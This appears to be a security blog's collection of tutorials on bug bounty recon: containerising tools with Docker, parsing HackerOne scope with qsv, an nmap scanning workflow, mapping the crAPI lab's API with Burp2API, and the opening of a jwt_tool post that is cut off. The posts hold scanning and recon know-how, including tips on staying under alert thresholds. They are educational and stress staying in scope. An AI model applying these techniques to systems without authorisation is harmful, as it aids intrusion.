
  • Building a Recon Toolkit with Docker

    With the rise in popularity of bug bounty hunting, there have been a lot of great tools developed. ProjectDiscovery’s suite of tools and contributions made by Tomnomnom certainly come to mind.

    With the number of tools, however, comes the complexity of managing them: keeping them up to date, making sure dependencies are installed, keeping your bounty tools separate from personal projects, and dealing with the clutter that comes with having tons of tools.

    The solution: Docker. Docker is a platform for running and managing containers. You can think of a container as a lightweight VM. That lightness comes from sharing resources with your host machine instead of virtualizing lower-level components (the kernel, for example).

    With Docker, you can package all of your bug bounty tools inside of a container, which allows for:

    • Portability – your tools are guaranteed to run anywhere (so long as Docker is installed).
    • Isolation – everything lives inside of the container. You don’t have to install/maintain unnecessary bloat on your host machine to get all of your tools working.
    • Easy cleanup – once the container is removed, the tools and their dependencies go with it. Getting everything up and running again is as easy as re-building/pulling the container.
    • Easy updates – If you do your setup right, updating all of your tools is as easy as removing then rebuilding the container. You don’t have to worry about anything else!

    I’m sure I sold you on the idea. Let’s get into how to practically do it!

    Containerizing your toolkit

    1. Setting the foundation

    I’m not going to cover how to install Docker or how to manage containers. Docker has its own documentation, which I highly recommend reading if you’re new to it.

    For now, all you need to get started is a Dockerfile in a directory like this:

    $ mkdir recon-toolkit-demo
    $ cd recon-toolkit-demo
    $ touch Dockerfile

    Now, we can start adding to the Dockerfile.

    Every Dockerfile starts with a base layer using the FROM keyword. For my toolkit, I’m choosing a variant of Debian for its ease of use and wide support. But feel free to choose your favorite OS (as long as it’s Unix-based 🙂).

    FROM debian:bookworm-slim

    This is all I need to build and run the container:

    $ docker build . -t recon-toolkit-demo
    $ docker run -it recon-toolkit-demo

    And just like that, you have your own Linux shell:

    root@26e0023b58e6:/# ls
    bin   dev  home  lib64	mnt  proc  run	 srv  tmp  var
    boot  etc  lib	 media	opt  root  sbin  sys  usr
    root@26e0023b58e6:/# 

    Pretty cool!

    2. Installing tools

    For demo purposes, I’m only going to install one tool. Everyone’s favorite subdomain enumeration tool: subfinder.

    Reading the install instructions, I first need to install Go.

    But before I even do that, I need curl so I can download Go:

    root@26e0023b58e6:/# apt-get update && apt-get install curl -y

    Now that that’s taken care of, I can run through Go’s install steps:

    root@26e0023b58e6:/# curl 'https://dl.google.com/go/go1.25.6.linux-amd64.tar.gz' -O
    root@26e0023b58e6:/# rm -rf /usr/local/go && tar -C /usr/local -xzf go1.25.6.linux-amd64.tar.gz
    root@26e0023b58e6:/# export PATH=$PATH:/usr/local/go/bin
    root@26e0023b58e6:/# go version
    go version go1.25.6 linux/amd64
    

    Now we can install subfinder:

    root@26e0023b58e6:/# go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
    root@26e0023b58e6:/# export PATH=$PATH:/root/go/bin/         
    root@26e0023b58e6:/# subfinder --version
    [INF] Current Version: v2.12.0
    [INF] Subfinder Config Directory: /root/.config/subfinder

    Great! Now we have everything we need.

    The only problem is that when I re-build the container, none of the tools we installed will be there.

    To solve this, we just have to translate our manual install steps (which we verified work) into the Dockerfile:

    FROM debian:bookworm-slim
    RUN apt-get update && apt-get upgrade -y && apt-get install curl -y
    
    # go install
    RUN curl 'https://dl.google.com/go/go1.25.6.linux-amd64.tar.gz' -O 
    RUN rm -rf /usr/local/go && tar -C /usr/local -xzf go1.25.6.linux-amd64.tar.gz
    ENV PATH=$PATH:/usr/local/go/bin
    
    # subfinder install
    RUN go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
    ENV PATH=$PATH:/root/go/bin/

    With the exception of ENV (which is pretty self-explanatory), everything looks the same as our manual setup steps.

    Now we can build the container again and run it to verify everything works:

    $ docker build . -t recon-toolkit-demo
    $ docker run -it recon-toolkit-demo
    root@d351c95c3742:/# subfinder --version
    [INF] Current Version: v2.12.0
    [INF] Subfinder Config Directory: /root/.config/subfinder

    Cool!

    Tip: Use docker run -it to debug and manually verify if something goes wrong.

    3. Install configurations

    subfinder is great out of the box, but even better when you add API keys.

    To do this, you can specify a provider-config.yaml, which is stored by default at $CONFIG/subfinder/provider-config.yaml.

    To achieve this in Docker, we can use the COPY directive to transfer the file from our working directory to the container, like so:

    $ touch provider-config.yaml
    $ echo 'COPY provider-config.yaml /root/.config/subfinder/provider-config.yaml' >> Dockerfile

    Of course, passing an empty provider-config.yaml won’t get you anywhere. You would need to specify your own keys. But this is how you would transfer config files into the container.
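
    For reference, subfinder’s provider config maps each source name to a list of API keys. Something along these lines (shodan and securitytrails are real subfinder sources, but the keys below are obviously just placeholders):

    # provider-config.yaml -- placeholder keys for illustration only
    shodan:
      - SHODAN_API_KEY_GOES_HERE
    securitytrails:
      - SECURITYTRAILS_API_KEY_GOES_HERE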

    4. Binding to a workspace

    Usually when I do my bounty recon, I like to keep all of my recon files on my host machine. That way, they’re persisted and I can process them using other tools I have installed on my machine.

    To do this, you can create a dedicated directory on the container for bounty recon files by adding this to the Dockerfile:

    RUN mkdir /bounty

    Then, you can run the container (after re-building) with the --mount argument:

    $ docker run -it --mount type=bind,source=/path/to/local/bounty_dir,target=/bounty recon-toolkit-demo

    Now, if you cd into the /bounty directory on the container, you should see the files from your host’s bounty directory!

    From there, you can run subfinder on any of your workspace files. And, if you write the output to a file under /bounty, it will be saved on your local machine. The same behavior as if you had subfinder installed and running on your host!
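
    For example, a one-off run might look roughly like this, assuming you already have a wildcards.txt sitting in your bounty directory (-dL points subfinder at a file of domains):

    $ docker run --mount type=bind,source=/path/to/local/bounty_dir,target=/bounty \
        recon-toolkit-demo subfinder -dL /bounty/wildcards.txt -o /bounty/subdomains.txt

    When the container exits, subdomains.txt is waiting for you in your local bounty directory.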

    5. Automating

    Now we can run subfinder through Docker manually, but eventually you’re going to want to automate runs, especially as your toolkit grows.

    To script this process, you can write a shell script:

    #!/bin/bash
    
    # Work out of the mounted workspace so inputs and outputs persist on the host.
    cd /bounty || exit 1
    cat wildcards.txt | subfinder -o subdomains.txt


    and then COPY it over as we did earlier with provider-config.yaml:

    COPY recon.sh .
    RUN chmod +x recon.sh

    Now we can run the script on our bounty files:

    docker run -it --mount type=bind,source=/path/to/local/bounty_dir,target=/bounty recon-toolkit-demo ./recon.sh
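
    That command gets long fast, so you may want a small wrapper script on your host. Here’s a minimal sketch (the $HOME/bounty path and the recon.sh default are placeholders for whatever you use):

    #!/bin/bash
    # recon: run the toolkit container against a local bounty directory.
    # $HOME/bounty is a placeholder; point it at wherever you keep recon files.
    docker run -it \
        --mount type=bind,source="$HOME/bounty",target=/bounty \
        recon-toolkit-demo "${@:-./recon.sh}"

    With no arguments it runs recon.sh; pass a command to run that instead.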

    Conclusion

    Now you should be able to use Docker to package your bug bounty tools into a container.

    From here, you may want to:

    • Add more tools
    • Publish your container to Dockerhub
    • Add wrapper scripts for ease of use

    You can check out my implementation on my GitHub.

    Happy hacking!

  • Automating HackerOne Scope Parsing with qsv for Bug Bounty Recon

    Before you start bug hunting on a new program, you need to feed the right assets to the right tools for automated recon. Sorting through the scope and getting your environment set up is a tedious (and delicate) process.

    No one should want to do this manually, especially since manual sorting can lead to mistakes. And you don’t want to make mistakes when it comes to staying in scope!

    So in this post, I’ll show you how to script this process with qsv.

    Note: HackerOne is the only bug bounty platform that provides scope as a CSV (that I know of). While these examples are HackerOne-specific, the parsing techniques are broadly useful anytime you’re working with structured data.

    How I organize recon

    When I start hacking on a web application, I separate the program’s assets into three main text files:

    1. domains.txt – In-scope domains
    2. wildcards.txt – Domains that support wildcards (ex: *.example.com)
    3. urls.txt – URLs in-scope (including those resolved from the first two files)

    Pretty simple stuff. Sometimes I will create more files if I want more specificity (ex: apis.txt).

    This setup makes it easy to pass information to tools and chain them together for automated recon. More on that in a future post!

    This is the end goal for my environment setup. I’ll show you how to make this happen with qsv.

    Using qsv

    1. Viewing headers

    The first thing I do when parsing a CSV is look at the headers. This is essentially the CSV’s schema.

    As an example, I’ll use Hubspot’s program scope.

    $ qsv headers hubspot_scope.csv
    1   identifier
    2   asset_type
    3   instruction
    4   eligible_for_bounty
    5   eligible_for_submission
    6   availability_requirement
    7   confidentiality_requirement
    8   integrity_requirement
    9   max_severity
    10  system_tags
    11  created_at
    12  updated_at

    Using headers, I can see the column number next to each header.

    2. Selecting relevant columns

    In this case, the most important columns for me are 1, 2, and 5.

    I can grab just those columns with the select command:

    $ qsv select 1,2,5 hubspot_scope.csv | qsv table -w 1 -p 1 -c 20
    identifier              asset_type         eligible_for_submiss...
    api*.hubapi.com         WILDCARD           true
    *.hubspotemail.net      WILDCARD           true
    events.hubspot.com      URL                false
    *.hubspotpagebuilder... WILDCARD           true
    chatspot.ai             URL                true
    api*.hubspot.com        WILDCARD           true
    HubSpot Sales Office... OTHER              true
    thespot.hubspot.com     URL                false
    *.hubspotpagebuilder... WILDCARD           true
    connect.com             URL                false
    HubSpot Android Mobi... GOOGLE_PLAY_APP_ID true
    ir.hubspot.com          URL                false
    *.hs-sites(-eu1)?.co... WILDCARD           true
    trust.hubspot.com       URL                false
    Customer Portal         OTHER              true
    Customer Connected D... OTHER              true
    app*.hubspot.com        WILDCARD           true
    shop.hubspot.com        URL                false
    HubSpot iOS Mobile A... APPLE_STORE_APP_ID true
    Other HubSpot-owned ... OTHER              true
    

    I also used the table command to format the output (with some extra arguments to make the data fit on smaller screen sizes). For information on a specific command, you can use qsv <command> --help.

    As you can see, qsv accepts input from stdin which makes it pipeable! Another reason to love it.

    3. Filtering

    Obviously I only want to pass assets that are in-scope to automated tools. And not all assets are created equal.

    This is where filtering comes into play.

    For example, only wildcard domains go into wildcards.txt. To grab only in-scope wildcards, I can use the search command:

    $ qsv search -s 5 true hubspot_scope.csv | qsv search -s 2 WILDCARD | qsv select 1
    identifier
    api*.hubapi.com
    *.hubspotemail.net
    *.hubspotpagebuilder.eu
    api*.hubspot.com
    *.hubspotpagebuilder.com
    *.hs-sites(-eu1)?.com
    app*.hubspot.com

    Great, now I have what I want. But it’s not ready to be passed to a tool yet, which is where the next step comes in.

    4. Processing

    For wildcards.txt, I’m after wildcards that begin with *.. I also don’t want to include the *. in the file.

    Doing that is easy enough with built-in tools:

    $ qsv search -s 5 true hubspot_scope.csv | qsv search -s 2 WILDCARD | qsv slice -n -s 1 | qsv select 1 | grep '^\*\.' | grep -v \( | sed 's/\*\.//'
    hubspotemail.net
    hubspotpagebuilder.eu
    hubspotpagebuilder.com

    I know it looks scary, but I’m just using slice to get rid of the header row, grep to get wildcards with a leading *. (for gathering subdomains), and sed to chop off the wildcard bit (because subfinder doesn’t process that).

    You can see that this process can get complicated fast. Which is where the final step comes in!

    5. Scripting

    It can be a pain to memorize these commands and one-liners are messy. Luckily, qsv is highly scriptable.

    For example, I can get wildcards and domains easily with this script:

    #!/bin/bash
    
    get_asset() {
        qsv search -s 5 true hubspot_scope.csv | qsv search -s 2 "$1" | qsv slice -n -s 1 | qsv select 1
    }
    
    parse_sub() {
        grep '^\*\.' | grep -v \( | sed 's/\*\.//'
    }
    
    parse_domain() {
        grep -Ev '^https?://'
    }
    
    get_asset URL | parse_domain > domains.txt
    get_asset WILDCARD | parse_sub > wildcards.txt

    Now, any time the scope changes, I can just run this script and run my tools again instead of copy-pasting.

    It’s also best practice to make this more general so it can work with other programs. With a strong knowledge of qsv, you can tailor your script to your needs for more efficient and safer recon.
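
    As a starting point, here’s a minimal sketch of a more general version that takes the scope CSV as an argument. It assumes the column positions match the HackerOne export shown above:

    #!/bin/bash
    # Usage: ./parse_scope.sh <scope.csv>
    # Assumes HackerOne's layout: 1=identifier, 2=asset_type, 5=eligible_for_submission
    scope_csv="$1"
    
    get_asset() {
        qsv search -s 5 true "$scope_csv" | qsv search -s 2 "$1" | qsv slice -n -s 1 | qsv select 1
    }
    
    parse_sub() {
        grep '^\*\.' | grep -v '(' | sed 's/\*\.//'
    }
    
    parse_domain() {
        grep -Ev '^https?://'
    }
    
    get_asset URL | parse_domain > domains.txt
    get_asset WILDCARD | parse_sub > wildcards.txt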

    Conclusion

    Setting up an environment for automated recon and staying in scope can be a painful task. But, qsv can take most of that pain away.

    Hopefully you got enough of a taste of qsv to be able to use it confidently on your bug bounty endeavors.

    Thanks for reading and happy hunting!

  • Effective Network Scanning with Nmap: A Practical Workflow

    There’s a ton of content about the network mapping tool, nmap, and rightfully so. It’s a powerful tool in the hands of a capable user.

    But most of the tutorials out there are just regurgitations of the man page or docs in various forms. Many only cover basic usage of the tool that can be learned by typing nmap -h.

    So, in this post, I’m going to take a more practical approach by showing you how to efficiently scan a network from the host discovery phase to in-depth enumeration.

    Host discovery

    Before we start scanning ports, we need to know what hosts are available to scan.

    We can do that by telling nmap to omit the port scan and just do host discovery with -sn:

    $ sudo nmap -sn 192.168.1.0/24 -oA host_discovery
    
    Starting Nmap 7.95 ( https://nmap.org ) at [timestamp]
    Nmap scan report for 192.168.1.1
    Host is up (0.0042s latency).
    MAC Address: DC:62:79:**:**:** (Unknown)
    Nmap scan report for 192.168.1.2
    Host is up (0.087s latency).
    MAC Address: 16:1A:32:**:**:** (Unknown)
    Nmap scan report for 192.168.1.90
    Host is up (0.11s latency).
    MAC Address: B8:A1:75:**:**:** (Roku)
    Nmap scan report for [hostname redacted] (192.168.1.171)
    Host is up (0.18s latency).
    MAC Address: C0:35:32:**:**:** (Liteon Technology)
    Nmap scan report for 192.168.1.231
    Host is up (0.098s latency).
    MAC Address: C2:3D:99:**:**:** (Unknown)
    Nmap scan report for 192.168.1.58
    Host is up.
    Nmap done: 256 IP addresses (6 hosts up) scanned in 3.33 seconds

    Now, we have a list of live hosts available for scanning.

    You may have noticed that I used -oA to save the output to all nmap supported output types: normal, greppable, and XML. I’d rather save the output into extra formats I may not use instead of missing a format and having to rescan.

    As a pentester, time is more valuable than disk space.

    Scanning

    Now that we know what hosts are available on the network, we can begin scanning for open ports.

    To make this easy, I put the IPs of the live hosts in a file by parsing the greppable output from earlier:

    $ grep 'Host:' host_discovery.gnmap | cut -d ' ' -f 2 | tee live_hosts.txt
    
    192.168.1.1
    192.168.1.2
    192.168.1.90
    192.168.1.171
    192.168.1.231
    192.168.1.58

    This way, I can pass nmap the file instead of typing out each host. You can see how tedious this would be if I were scanning a much larger network with hundreds of hosts.

    Initial port scan

    Now that we have some live targets, it’s time to start scanning.

    Using the -iL option, I can directly pass the list of live hosts to nmap:

    $ sudo nmap -iL live_hosts.txt -sT -F -Pn -oA fast_scan_all_hosts
    Starting Nmap 7.95 ( https://nmap.org ) at [timestamp]
    
    Nmap scan report for 192.168.1.1
    Host is up (0.034s latency).
    Not shown: 96 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    53/tcp   open  domain
    80/tcp   open  http
    443/tcp  open  https
    1900/tcp open  upnp
    ...
    
    Nmap scan report for 192.168.1.231
    Host is up (0.020s latency).
    Not shown: 99 closed tcp ports (conn-refused)
    PORT      STATE SERVICE
    49152/tcp open  unknown
    
    ...

    For brevity, I only included the hosts that returned open ports.

    You may have noticed that I used the -F option in this scan. This makes nmap only scan the top 100 most common (according to statistical data) ports. Otherwise, nmap would scan for the top 1000 ports.

    I limit the scan significantly for speed because I plan on using this information to prioritize targets for more in-depth analysis.

    Just a few open ports can reveal a lot about a host’s role within a network. In this example, it is clear that the 192.168.1.1 system is a router. It has web ports 80 and 443 open, which likely serve an admin interface. Port 1900 is Universal Plug and Play (UPnP), a protocol commonly used by residential routers to easily connect devices.

    On an enterprise network, a similar train of thought could help you identify web servers, workstations, databases, file servers, and domain controllers that may be more critical targets to attack than, for example, mail servers and printers.

    It’s also worth noting that you can adjust the depth of this initial scan depending on how many hosts you’re scanning at once. If you have hundreds of hosts to scan, you may want to use --top-ports to scan fewer ports per host:

    sudo nmap -Pn -iL live_hosts.txt -sT --top-ports 50 -oA fast_scan_all_hosts

    Or, if you’re seeking specific targets, like web servers for example, you can supply ports with -p:

    sudo nmap -iL live_hosts.txt -sT -p 53,80,443,3006,8080 -Pn -oA fast_scan_all_hosts

    You have control depending on the context of the network you are scanning. That is the beauty of using nmap modularly in this way!

    Those of you with keen eyes may have also noticed that I used -sT to perform a full TCP connect scan instead of the default -sS (SYN) scan. I chose this because flooding a network with SYN packets can trigger alerts. I picked this tip up from Tim Medin’s SEC560 course at SANS.

    Full port scan

    Now that we’ve picked out targets to scan, it’s time to discover more ports.

    Specifically, I want to scan all of the ports on each of my selected targets. Or, at least more than my initial scan, depending on the context (remember, you have the power)!

    For the sake of this example, I’ll just scan the router:

    $ sudo nmap -Pn -sT -p- --open 192.168.1.1 -oA all_ports_1
        
    Starting Nmap 7.95 ( https://nmap.org ) at [timestamp]
    Nmap scan report for 192.168.1.1
    Host is up (1.1s latency).
    Not shown: 56546 closed tcp ports (conn-refused), 8985 filtered tcp ports (no-response)
    Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
    PORT      STATE SERVICE
    53/tcp    open  domain
    80/tcp    open  http
    443/tcp   open  https
    20001/tcp open  microsan
    
    Nmap done: 1 IP address (1 host up) scanned in 35.12 seconds

    I used -p- as a shortcut for all 65,535 ports. And it paid off because I discovered a new port to probe!

    This is why it’s important to consider all ports. Although it may take some extra time, you may find uncommon (and potentially less secure) open ports.

    Now it’s time to go even deeper and enumerate the ports.

    Deep scan

    nmap has some amazing enumeration capabilities. We’ll save more advanced scanning for a later post, since there is a lot to cover there.

    For now, a version+script scan with -sVC will suffice:

    $ sudo nmap -Pn -sVC -p 53,80,443,20001 192.168.1.1 -oA version_script_1
    
    Starting Nmap 7.95 ( https://nmap.org ) at [timestamp]
    Nmap scan report for 192.168.1.1
    Host is up (0.0061s latency).
    
    PORT      STATE SERVICE    VERSION
    53/tcp    open  tcpwrapped
    | dns-nsid: 
    |   NSID: rochnyei-dns-cac-308 (726f63686e7965692d646e732d6361632d333038)
    |   id.server: rochnyei-dns-cac-308
    |_  bind.version: Akamai Vantio CacheServe 7.7.3.0.d
    80/tcp    open  http       BusyBox http 1.19.4
    |_http-title: Site doesn't have a title (text/html).
    443/tcp   open  ssl/http   BusyBox http 1.19.4
    | ssl-cert: Subject: commonName=tplinkwifi.net/countryName=CN
    | Subject Alternative Name: DNS:tplinkwifi.net, IP Address:192.168.1.1
    | Not valid before: 2010-01-01T00:00:00
    |_Not valid after:  2030-12-31T00:00:00
    |_http-title: Site doesn't have a title (text/html).
    20001/tcp open  ssh        Dropbear sshd 2019.78 (protocol 2.0)
    MAC Address: DC:62:79:DB:24:C8 (Unknown)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 44.24 seconds
                                                                  

    I supplied only the open ports detected earlier during the full scan with -p.
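
    If you don’t feel like picking the ports out by hand, you can pull them straight from the full scan’s greppable output. A quick sketch, assuming the standard .gnmap Ports: line format:

    $ grep 'Ports:' all_ports_1.gnmap | grep -oE '[0-9]+/open' | cut -d '/' -f 1 | paste -sd, -
    53,80,443,20001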

    -sVC is shorthand for:

    • -sV: Version scan. nmap probes the port to get the service version.
    • -sC: Script scan. Runs the default set of scripts from the Nmap Scripting Engine (NSE) to enumerate services.

    As you can see, this gave us tons of juicy info! Let’s go over what we learned about this device:

    • This is a TP-Link router based on the SSL certificate’s common name
    • The mystery port (20001) is running ssh
    • It’s running some form of Linux

    We could probe further and look up versions for more information or potential known vulnerabilities. But this is an excellent start!

    Where to go from here…

    As you can see, nmap is a very powerful scanning tool when used effectively. We were able to find a lot of information from just a few scans.

    But this is just the beginning! You’ll want to repeat the process with more hosts. And the beauty of this modular system is that you can adjust each step to suit your needs.

    After scanning more hosts, you’ll have a pretty good idea of which hosts you want to dig into and eventually exploit. Luckily, nmap has some incredible enumeration and scripting capabilities that can make it a great tool for the job. I promise I’ll do an nmap scripting deep dive later.

    If you’re saving every scan in multiple formats (as you should), things can get messy fast. Fortunately, tools like Metasploit can import nmap XML output to help manage and analyze your findings. I’ll cover that soon.
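
    As a quick preview (assuming the Metasploit database is already initialized), the import boils down to a few msfconsole commands:

    msf6 > db_import version_script_1.xml
    msf6 > hosts
    msf6 > services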

    Hope you enjoyed this, and stay tuned for more related content!

  • Reverse Engineering APIs with Burp2API

    Postman is one of my favorite tools for testing the functionality and security of APIs. It allows you to organize API routes neatly and write/run automated tests across collections of requests.

    If you have access to the API spec of an application you are testing, you can easily import the mapped API directly into Postman in a structured fashion.

    But not all APIs have public spec files or even documentation. Sometimes, we have to fly a little blind.

    Well, not completely blind. We can use a proxy to capture the requests that form the API.

    The Process

    There are many proxies to choose from, ranging from the CLI tool mitmproxy to the feature-packed hacking tool Burpsuite. It doesn’t matter which one you choose; they all serve the same purpose: capturing web traffic.

    The tricky part is getting that captured data into Postman in an organized fashion.

    Postman does have a proxy built in, which, although convenient, doesn’t organize the routes the way importing an API spec would.

    I used to use a technique I learned in APIsec University’s API Pentesting Course that involved using mitmproxy to capture the traffic, then mitmproxy2swagger to turn the captured data into an API spec.

    This worked well, but I’m not the biggest fan of mitmproxy. I like using Burpsuite to manage my testing and found myself flipping back and forth between them.

    I then stumbled upon this Burp extension that exported selected requests into a Postman collection format. But it didn’t do any formatting or structuring.

    There had to be a better way…

    Enter Burp2API

    Then, while I was thinking about developing my own tool, I stumbled upon this little gem: Burp2API. It’s a Python script that converts exported requests from Burpsuite into the OpenAPI spec format.

    My prayers had been answered!

    It’s basically mitmproxy2swagger but with the added benefit of not being dependent on mitmproxy.

    Why not just use mitmproxy?

    Don’t get me wrong, mitmproxy is a great tool, and I’m sure you CLI cronies out there swear by it. But there are numerous benefits to using Burpsuite over it.

    Firstly, it’s great for project management. You can specify a scope, make observations with Burp Organizer, and track any issues Burp automatically identifies.

    Secondly (and probably the most important), you have automated mapping capabilities. You can use Burp to scan and crawl to find endpoints you may miss by relying on manual browsing alone.

    Lastly, as a pentester, you will undoubtedly go back to Burp after your initial exploration phase. So, why not just stay there? That way, you can keep all of your gathered traffic in one place for more convenient analysis later.

    At the end of the day, we’re hackers. It makes sense to use the best tool for the job.

    I’m also big on simplicity. So, if I can get the same or better results using fewer tools, that’s a win for me. Plus, I’d rather be an expert with a few tools than skim the surface with many.

    Reverse Engineering crAPI

    For demonstration purposes, I’ll be using OWASP’s crAPI. crAPI is an intentionally vulnerable API. I love it because it’s built with a modern front end, making it feel more realistic.

    I highly recommend sharpening your skills with crAPI. As a realistic target, it allows you to practice the hacker mindset, rather than just regurgitating the exact steps you need to follow to solve a level in a CTF-like environment.

    So, let’s put our hacking caps on and dive in!

    Step 1: Manually gathering traffic

    The first step in our reverse engineering journey involves browsing the application as a normal user might. Nothing too glamorous.

    However, we’ll be running Burpsuite in the background so we can get a more in-depth look at how the application is working behind the scenes.

    I’m not going to go in-depth about how to set up Burp as a proxy, so here’s an article on that.

    The goal here is to cover every function of the app:

    • Signing in
    • Uploading profile pictures
    • Buying products
    • Commenting on posts
    • Resetting the account password

    Whatever the app allows us to do, we’re going to do.

    Remember, we’re not looking to break anything just yet, but don’t let that stop you from thinking about potential attack vectors while getting to know the app.

    Just by creating an account and signing into crAPI, I’m able to get an idea of how the API is structured:

    I’ve heard the argument that you should spend a ton of time getting to know the target application before you even fire up any hacking tools. While I partially agree with this sentiment, I believe that you should always have Burp running in the background as soon as you start browsing the app.

    You may capture requests or find some functionality that you would otherwise miss if you saved Burpsuite for a second pass. Plus, Burpsuite passively scans captured traffic, so the more data, the better.

    Step 2: Discover more routes

    After exhausting manual exploration, it’s time to let Burp take the reins. There are a couple of ways that we can do this within Burp:

    1. Using a scan to crawl the application
    2. Using extensions

    Launching a scan with Burp

    To use Burp’s scanning capabilities, go to the Dashboard and click the New scan button:

    A window will pop up, asking us to choose a scan type. For our purposes (discovering more routes), I’ll select the Crawl option:

    The other two options actively scan the target, which is noisier and will take longer. I highly recommend exploring those, but be aware that a WAF would most likely start blocking your traffic (or more annoyingly, ban your IP) if you get too noisy.

    Next, add a list of URLs to scan.

    I’m skipping the scan and Resource pool configuration for simplicity. So, the last item we’ll configure is the Application login section. I’ll add my login credentials here:

    This allows the crawler to use the specified credentials whenever it finds a login form. Burp will be able to travel deeper into the application this way.

    Without filling this out, it would just crawl the login page.

    Now, we’ll hit the “Scan” button and let Burp explore the app for us.

    Once the crawl finished, the summary page revealed that it found some new routes:

    Burp even handily adds these to our Sitemap for us. How cool!

    Using JSLinkFinder

    Burpsuite’s crawler is just one tool we can use to discover more endpoints.

    Instead of crawling the site, we can also parse the JavaScript for links using JSLinkFinder.

    JSLinkFinder passively parses JS responses, so it most likely gathered links during the manual exploration phase. But, for demo purposes, I’ll show you how to trigger it in case it didn’t.

    In the Proxy’s History tab, select the JavaScript responses, right click them, then select Do a passive scan:

    We can see that JSLinkFinder found some links in the BurpJSLinkFinder tab:

    These will be automatically added to our sitemap. Unfortunately, since these are all out of scope, they won’t be of much use to us. But, it’s always good to explore options.

    Now that we collected routes manually and automatically, it’s on to phase 3!

    Step 3: Export the endpoints

    I like to use the Sitemap in the Target tab when exporting API requests. It gives me a structured look at the API.

    From the manual phase, we know that the crAPI API endpoints all contain api in the URL. We can filter the site map to get a more refined look at the API:

    Much better. This is exactly what I want to be reflected in Postman:

    To export the API routes, all we need to do now is right-click on the top-level URL and select Save selected items:

    Save the file in a convenient location.

    Note: There is an option to encode the request/response data in base64. You can leave that on; Burp2API does the decoding for us.

    Now, we can leave Burp and head over to the command line.

    Step 4: Converting to API spec

    Finally, it’s time to use burp2api!

    It’s as easy as running the Python script and supplying the file as an argument:

    $ burp2api.py crapi-api.req
    Output saved to output/crapi-api.req.json
    Modified XML saved to crapi-api.req_modified.xml

    The output is saved in an output directory along with a second file. I moved the JSON file out of there and renamed it for convenience’s sake:

    cp output/crapi-api.req.json ../crapi-api-spec.json
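
    Before importing it anywhere, a quick sanity check with jq (if you have it installed) shows which paths made it into the spec:

    $ jq -r '.paths | keys[]' crapi-api-spec.json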

    Now, we can upload it to the online swagger editor just like any old spec file:

    So simple and cool!

    Now it’s time to import this into Postman:

    Step 5: Importing to Postman

    Open up Postman in a fresh workspace. Then, click the Import button at the top.

    You can also just drag and drop the file anywhere in the window:

    When prompted, choose the option to import as OpenAPI 3.0:

    And finally, click Import.

    Now, you should have a beautifully organized mapping of the API in Postman:

    Why not just stay in Burpsuite?

    You may be wondering why we went through the effort of migrating to Postman when we had all the data we needed in Burp structured exactly the way we wanted.

    Ok, you might not have, but I’ll explain the method to my madness anyways.

    This method of reverse engineering is great for when you are running continuous, structured security tests on a single API.

    For example, at my job, the application I am testing makes use of an internal API. This API doesn’t have documentation or a spec file, so I would need to reverse engineer it to get the structure mapped out.

    As a Quality Engineer, I need to continuously test the API to make sure that changes don’t introduce bugs or security flaws during each development cycle. Postman is great for automating this process as I can write automated tests, then run them on a nightly basis using a cron-job to ensure stability.

    If you’re a pentester or bug bounty hunter, it may be more worth your time to just stay in Burp as you’re not likely going to be monitoring the API for the long-term.

    In short, make sure you understand the context of your testing and choose what works best for you.

    Conclusion

    I hope you gained something from reading this!

    This is typically the method I use for mapping as well as reverse-engineering APIs. So, you kind of got a two-for-one deal in this post!

    I personally like this better than the mitmproxy -> mitmproxy2swagger approach. It’s simpler and removes my dependency on mitmproxy. Fewer tools, yay!

    Please try this out for yourself against crAPI. Reading this post once and forgetting about it isn’t going to make you a better tester.

    So, practice, practice, PRACTICE!

    I also recommend you read Portswigger’s documentation on Burpsuite (even if you’re already familiar with the tool). The part walking through the pentest workflow using Burpsuite is highly valuable.

    Also, explore the courses in APISec University if you’re new or even an intermediate web/API hacker.

    Both of these resources are FREE so take advantage of them.

    I wish you the best on your security journey! Keep learning!

  • Exploiting crAPI with jwt_tool

    In this post, I’ll show you how to use jwt_tool to analyze and exploit JWT vulnerabilities in crAPI, an intentionally vulnerable API.

    We’re going to take a practical approach to learning how to use this tool. So, by the end of this, you’ll be able to use this tool in the real world.

    Let’s dive in!

    Brief Introduction to JWTs

    If you’re already familiar with JWTs, feel free to skip this section.

    A JWT (JSON Web Token) is a token format used for authentication and authorization. It consists of three parts:

    1. Header – Contains metadata about the token, including the algorithm used for signing.
    2. Payload – Contains claims (e.g., user ID, role, expiration time).
    3. Signature – Ensures token integrity and authenticity.

    JWTs can be signed with symmetric or asymmetric algorithms. Poor implementations can lead to security vulnerabilities, which we’ll explore using jwt_tool.
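
    To make that three-part structure concrete, here’s a small sketch that decodes a token’s header and payload on the command line. The token is a made-up HS256 example, purely for illustration:

    #!/bin/bash
    # Decode a JWT's header and payload without verifying the signature.
    TOKEN="eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJkZW1vIn0.signature"
    
    b64url_decode() {
        # Convert base64url to standard base64 and restore padding before decoding.
        local part
        part=$(echo -n "$1" | tr '_-' '/+')
        while [ $(( ${#part} % 4 )) -ne 0 ]; do part="${part}="; done
        echo "$part" | base64 -d
    }
    
    b64url_decode "$(echo "$TOKEN" | cut -d '.' -f 1)"; echo    # {"alg":"HS256"}
    b64url_decode "$(echo "$TOKEN" | cut -d '.' -f 2)"; echo    # {"sub":"demo"}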

    Intercepting a JWT

    To begin, we need to capture the JWT from crAPI. I created a test account and logged in to get a valid one. Then, you can use browser dev tools or an intercepting proxy to see requests using JWTs.  In my case, I used the network tab in Firefox’s dev tools:

    In this case, the JWT is stored in the Authorization header after the Bearer keyword.

    The JWT won’t always be in the headers. It can also be stored in the body or in cookies. Usually, the leading ey and the dots separating the sections are a giveaway that a JWT is in use.

    Passing the token to jwt_tool will tell us if this is a JWT for sure:

